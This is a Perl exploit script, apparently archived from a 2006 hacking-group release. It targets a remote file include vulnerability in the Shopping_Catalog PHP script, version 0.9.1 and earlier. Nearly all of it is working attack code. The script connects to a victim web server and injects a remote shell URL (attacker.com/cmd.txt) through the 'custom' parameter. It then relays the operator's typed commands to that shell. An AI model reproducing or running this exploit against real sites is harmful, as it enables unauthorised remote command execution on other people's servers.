Home / os / win10

shoppingcatalog.txt

Posted on 21 November 2006

#!/usr/bin/perl ################################################################################################ # # # Shopping_Catalog # # # # Class: Remote File Include Vulnerability # # Expl0iter by .... : the_Edit0r # # Location : Iran # # Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8) # # We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r # # D3vil_B0y_ir , Tornado , DarkAngel , Behbood # # <Spical TNX Irania Hackers : # # ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers # # Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar ) # # Remote: Yes # # Type: high # # download: http://www.gimescripts.com/categories/11%20Shopping%20Catalog%20PHP%20Script.zip # # # ################################################################################################ use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With Your Personal Script print " "; print "################################################################# "; print "# # "; print "# Shopping_Catalog <= 0.9.1 Remote File Include Vulnerability # "; print "# Expl0iter By : the_Edit0r # "; print "# Email: the_3dit0r[at]yahoo[dot]com # "; print "# Web Site : www.Xmors.com Www.Xmors.neT # "; print "# # "; print "################################################################# "; if (@ARGV < 2) { print " Usage: Expl0it.pl [host] [path] "; print " EX : Expl0it.pl www.victim.com /[path]/ "; exit; } $host=$ARGV[0]; $path=$ARGV[1]; print "Type Your Commands ( uname -a ) "; print "For Exiit Type END "; print "<Shell> ";$cmd = <STDIN>; while($cmd !~ "END") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host. "; print $socket "GET ".$path."index.php?function=custom&custom=".$cmdshell."?cmd=".$cmd."? HTTP/1.1 "; print $socket "Host: ".$host." "; print $socket "Accept: */* "; print $socket "Connection: close "; while ($raspuns = <$socket>) { print $raspuns; } print "<Shell> "; $cmd = <STDIN>; }

 

TOP